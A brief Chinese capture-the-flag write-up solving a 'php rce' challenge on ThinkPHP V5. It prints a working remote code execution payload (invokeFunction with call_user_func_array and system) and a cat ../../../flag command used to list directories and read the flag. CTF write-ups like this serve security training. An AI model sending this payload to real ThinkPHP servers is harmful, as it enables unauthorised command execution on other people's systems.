拿到这个题,看到题目rce即命令执行漏洞,打开一看是ThinkPHP V5

先找个不存在的页面看看是哪个版本的ThinkPHP :

php rce 攻防世界

看到版本和题目提示rce,我们通过百度了解一下此漏洞:它关于controller过滤不严密得相关漏洞 https://www.cnblogs.com/backlion/p/10106676.html

1.构造payload:

?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

system函数是用来执行外部应用程序的,通过&将其与我们要执行的ls(dir)连起来,列出当前的目录和文件的

php rce 攻防世界

当前没有,那就..向上一级翻

php rce 攻防世界

翻了三番发现了flag,那么就来查看flag   

cat ../../../flag

php rce 攻防世界

得到flag

相关文章: